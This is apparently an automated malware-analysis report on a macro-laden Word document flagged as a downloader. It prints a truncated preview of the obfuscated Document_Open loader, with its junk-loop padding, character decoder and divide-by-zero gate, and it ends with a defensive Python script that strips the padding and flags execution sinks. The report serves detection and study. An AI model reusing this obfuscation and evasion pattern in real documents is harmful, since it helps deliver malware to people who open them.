Verdict: MALICIOUS
Risk Score: 322

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
- T1203 Exploitation for Client Execution
The sample is an OOXML (Word) document carrying a VBA project whose Document_Open macro is an obfuscated auto-exec loader. The visible source is padded with junk counting loops behind opaque predicates, strings are rebuilt at runtime by a custom decoder (BCJ walks a byte array and appends one decoded character per element), and a helper (Uu) deliberately raises a division-by-zero error under On Error Resume Next and branches on Err.Description before Document_Open calls the next stage (PNZ9). A CreateObject call, reported both by the source heuristics and by the compiled p-code scan, is the execution sink; together with the ClamAV signature Doc.Downloader.OXmlEvader-5 this points to a downloader that fetches and runs a second-stage payload. No download URL or host is present as a literal anywhere in the document: the only URLs extracted are OOXML XML namespace identifiers. That is exactly the obfuscated-loader shape the heuristics describe, in which object names and network indicators are reconstructed at runtime rather than stored in the macro source.
Heuristics (7)

- ClamAV: Doc.Downloader.OXmlEvader-5 (critical; CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.OXmlEvader-5
- VBA project inside OOXML (medium; OOXML_VBA; 4 related findings): Document contains a VBA project, i.e. VBA macros are present.
- Obfuscated auto-exec VBA loader (critical; OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- Document_Open macro (high; OLE_VBA_DOCOPEN): Document_Open auto-exec macro present.
- CreateObject call (high; OLE_VBA_CREATEOBJ): CreateObject call present.
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All twelve URLs below were found in document text (OOXML body / shared strings), none through the macro channel, and every one of them is a standard OOXML/WordprocessingML XML namespace identifier rather than a network indicator, so none belongs on an IOC list:
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 92332 bytes | 07609d4fb89c16b24308214563135ecc095cb8ffad34cbfd2a9bdba6c4ce3f3c |

Preview of macros.bas (first 1,000 lines of the extracted script; the listing is truncated below):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim WJE4CWJq(2754) As Integer
Dim VYGpI(87219000 / 9691) As Long, DcJx(19730 - 9731) As Long
Private Sub Document_Open()
Dim CZ As Integer
CZ = 53
If CZ > 32 Then
CZ = 9
Do
CZ = CZ + 1
Loop While CZ <= 198
End If
On Error Resume Next
Dim AAUOia As Integer
AAUOia = 70
If AAUOia > 32 Then
AAUOia = 9
While AAUOia <= 122
AAUOia = AAUOia + 1
Wend
End If
Dim Tu0Z As Long, W8L As Long, NRoG As Long
Dim UWJTH As Integer
UWJTH = 61
If UWJTH > 32 Then
UWJTH = 9
For UWJTH = 1 To 45
UWJTH = UWJTH + 1
Next
End If
Tu0Z = 90296: W8L = 0: NRoG = 0
Dim HsuQzAS As Integer
HsuQzAS = 2
If HsuQzAS > 28 Then
HsuQzAS = 9
Do
HsuQzAS = HsuQzAS + 1
Loop While HsuQzAS <= 238
End If
For W8L = 1 To Tu0Z
NRoG = NRoG + 1
Next W8L
Dim YGo3o As Integer
YGo3o = 64
If YGo3o > 37 Then
YGo3o = 3
While YGo3o <= 256
YGo3o = YGo3o + 1
Wend
End If
If NRoG = Tu0Z Then
Dim B1 As Integer
B1 = 41
If B1 > 25 Then
B1 = 7
Do
B1 = B1 + 1
Loop While B1 <= 85
End If
Dim Xac As Integer, B0L6gvwZp As String
For Xac = 2 To 411
B0L6gvwZp = B0L6gvwZp + Xac
Next
Dim WamS6pYyNp As Integer
WamS6pYyNp = 90
If WamS6pYyNp > 20 Then
WamS6pYyNp = 9
Do
WamS6pYyNp = WamS6pYyNp + 1
Loop While WamS6pYyNp <= 135
End If
If Uu(29) = True Then PNZ9
Else
Dim MbeIa12Pk As Integer
MbeIa12Pk = 60
If MbeIa12Pk > 24 Then
MbeIa12Pk = 9
For MbeIa12Pk = 1 To 199
MbeIa12Pk = MbeIa12Pk + 1
Next
End If
UGp
Dim GflGsQS As Integer
GflGsQS = 43
If GflGsQS > 34 Then
GflGsQS = 4
While GflGsQS <= 151
GflGsQS = GflGsQS + 1
Wend
End If
End If
Dim LDDfbnQRLe As Integer
LDDfbnQRLe = 16
If LDDfbnQRLe > 31 Then
LDDfbnQRLe = 4
While LDDfbnQRLe <= 163
LDDfbnQRLe = LDDfbnQRLe + 1
Wend
End If
End Sub
Private Function BCJ(NhaKXe() As Byte) As String
Dim HnTb As Integer
HnTb = 36
If HnTb > 33 Then
HnTb = 5
Do While HnTb <= 265
HnTb = HnTb + 1
Loop
End If
Dim XaXhf As Long
Dim EtD As Integer
EtD = 73
If EtD > 37 Then
EtD = 3
Do While EtD <= 1
EtD = EtD + 1
Loop
End If
For XaXhf = 0 To VYw(NhaKXe)
Dim Gpy As Integer
Gpy = 96
If Gpy > 22 Then
Gpy = 7
For Gpy = 1 To 128
Gpy = Gpy + 1
Next
End If
BCJ = BCJ & B2iuZ4ahLd(NhaKXe(XaXhf))
Dim PBa7CCx7EF As Integer
PBa7CCx7EF = 17
If PBa7CCx7EF > 25 Then
PBa7CCx7EF = 5
Do While PBa7CCx7EF <= 185
PBa7CCx7EF = PBa7CCx7EF + 1
Loop
End If
Next XaXhf
Dim HD5W5zuti As Integer
HD5W5zuti = 28
If HD5W5zuti > 23 Then
HD5W5zuti = 7
Do
HD5W5zuti = HD5W5zuti + 1
Loop While HD5W5zuti <= 189
End If
End Function
Private Sub UGp()
Dim C8Kq9 As Integer
C8Kq9 = 25
If C8Kq9 > 35 Then
C8Kq9 = 3
Do While C8Kq9 <= 123
C8Kq9 = C8Kq9 + 1
Loop
End If
Dim W0br As Integer
W0br = 17
If W0br > 30 Then
W0br = 5
For W0br = 1 To 30
W0br = W0br + 1
Next
End If
End Sub
Private Function Uu(OL As Integer) As Boolean
Dim CwMk As Integer
CwMk = 37
If CwMk > 23 Then
CwMk = 7
While CwMk <= 29
CwMk = CwMk + 1
Wend
End If
On Error Resume Next
Dim T4wwGlZCH As Integer
T4wwGlZCH = 50
If T4wwGlZCH > 24 Then
T4wwGlZCH = 7
Do
T4wwGlZCH = T4wwGlZCH + 1
Loop While T4wwGlZCH <= 295
End If
Debug.Assert 99175 / 0
Dim XwSjcLhso2 As Integer
XwSjcLhso2 = 83
If XwSjcLhso2 > 25 Then
XwSjcLhso2 = 3
Do While XwSjcLhso2 <= 165
XwSjcLhso2 = XwSjcLhso2 + 1
Loop
End If
If Err.Description <> "" Then Uu = True
Dim D85 As Integer
D85 = 90
If D85 > 26 Then
D85 = 8
For D85 = 1 To 237
D85 = D85 + 1
Next
End If
End Function
Private Function VYw(ByVal UtFDbGj4 As Variant) As Long
Dim J99ss3 As Integer
J99ss3 = 1
If J99ss3 > 35 Then
J99ss3 = 8
While J99ss3 <= 153
J99ss3 = J99ss3 + 1
Wend
End If
On Error GoTo OnUX
Dim LDI0ONwy As Integer
LDI0ONwy = 96
If LDI0ONwy > 22 Then
LDI0ONwy = 7
For LDI0ONwy = 1 To 128
LDI0ONwy = LDI0ONwy + 1
Next
End
... (truncated)
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 170496 bytes | 94735137ef08ed83a876f621aee976d06d1bb8c88eaa0c3f247659782aa260ab |

Detection for vbaProject_00.bin:
- ClamAV: Doc.Downloader.OXmlEvader-5
- Obfuscation or payload: unlikely
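As a worked example of how to take the loader's visible shape apart, the script below (added for this page; it is neither the analyzer's code nor the sample's macro) strips the eight-line junk blocks that pad every routine in the preview, then checks the cleaned text for the three signals the heuristics above key on: an auto-exec entry point, an execution sink, and the deliberate runtime error raised under On Error Resume Next that Uu() uses as a gate before PNZ9. SAMPLE is a constructed excerpt modelled on the preview; its CreateObject line is hypothetical and stands in for the call that the OLE_VBA_CREATEOBJ and p-code heuristics report but that falls outside the shown preview.

```python
"""Triage of an extracted VBA macro: strip the junk-loop padding, then report
the auto-exec entry points, execution sinks and the error-based gate that are
left. Added example for this page, not the analyzer's own code. SAMPLE is a
constructed excerpt modelled on the preview above; its CreateObject line stands
in for the call the heuristics report, which lies outside the preview."""
import re

# One junk block is eight lines on a single variable: Dim, assign, an opaque
# If, re-assign, a three-line counting loop, End If. The four loop spellings
# seen in the preview (Do/Loop While, While/Wend, For/Next, Do While/Loop) are
# accepted, so only blocks that never do real work are removed.
_JUNK_BLOCK = re.compile(
    r"^[ \t]*Dim (?P<v>\w+) As Integer[ \t]*\n"
    r"[ \t]*(?P=v) = \d+[ \t]*\n"
    r"[ \t]*If (?P=v) > \d+ Then[ \t]*\n"
    r"[ \t]*(?P=v) = \d+[ \t]*\n"
    r"[ \t]*(?:Do|Do While (?P=v) <= \d+|While (?P=v) <= \d+|For (?P=v) = 1 To \d+)[ \t]*\n"
    r"[ \t]*(?P=v) = (?P=v) \+ 1[ \t]*\n"
    r"[ \t]*(?:Loop While (?P=v) <= \d+|Loop|Wend|Next)[ \t]*\n"
    r"[ \t]*End If[ \t]*\n?",
    re.MULTILINE,
)
_AUTOEXEC = re.compile(r"\b(Document_Open|AutoOpen|Auto_Open|Workbook_Open|"
                       r"AutoExec|Document_Close|AutoClose)\b")
_SINKS = re.compile(r"\b(CreateObject|GetObject|Shell|ShellExecute|WScript\.Shell|"
                    r"URLDownloadToFile|XMLHTTP|WinHttpRequest)\b")
# A runtime error raised on purpose under On Error Resume Next, followed by a
# branch on Err: the preview's Uu() does this with Debug.Assert 99175 / 0.
_ERR_GATE = re.compile(
    r"On Error Resume Next[\s\S]*?/ 0\b[\s\S]*?Err\.(?:Number|Description)")


def strip_junk(src):
    """Return (source without junk blocks, number of blocks removed)."""
    return _JUNK_BLOCK.subn("", src.replace("\r\n", "\n"))


def triage(src):
    """Report the page's heuristic signals on the cleaned text."""
    cleaned, blocks = strip_junk(src)
    total = len(src.splitlines())
    return {
        "junk_blocks": blocks,
        "junk_line_ratio": round((total - len(cleaned.splitlines())) / total, 2),
        "autoexec": sorted({m.group(1) for m in _AUTOEXEC.finditer(cleaned)}),
        "sinks": sorted({m.group(1) for m in _SINKS.finditer(cleaned)}),
        "error_gate": bool(_ERR_GATE.search(cleaned)),
        "cleaned": cleaned,
    }


# Constructed input modelled on the preview; the PNZ9 body is hypothetical.
SAMPLE = """Private Sub Document_Open()
Dim CZ As Integer
CZ = 53
If CZ > 32 Then
CZ = 9
Do
CZ = CZ + 1
Loop While CZ <= 198
End If
On Error Resume Next
Dim UWJTH As Integer
UWJTH = 61
If UWJTH > 32 Then
UWJTH = 9
For UWJTH = 1 To 45
UWJTH = UWJTH + 1
Next
End If
If Uu(29) = True Then PNZ9
End Sub
Private Function Uu(OL As Integer) As Boolean
On Error Resume Next
Dim HnTb As Integer
HnTb = 36
If HnTb > 33 Then
HnTb = 5
Do While HnTb <= 265
HnTb = HnTb + 1
Loop
End If
Debug.Assert 99175 / 0
If Err.Description <> "" Then Uu = True
End Function
Private Sub PNZ9()
Set Obj = CreateObject(Decoded)
End Sub
"""

if __name__ == "__main__":
    report = triage(SAMPLE)
    print(report["cleaned"])
    print({k: v for k, v in report.items() if k != "cleaned"})
```

Feed the decoded olevba output (macros.bas above) to triage() to run it on the real extraction. A high junk_line_ratio with only a handful of statements left is itself a strong signal, independent of whatever string the decoder eventually produces. The stripping is pattern-based: a variant that spells the padding differently (a shared Dim line, a Step clause, a different comparison) is left in place, and error_gate only confirms the shape of the gate; which branch Uu() selects in a given environment is a question for dynamic analysis.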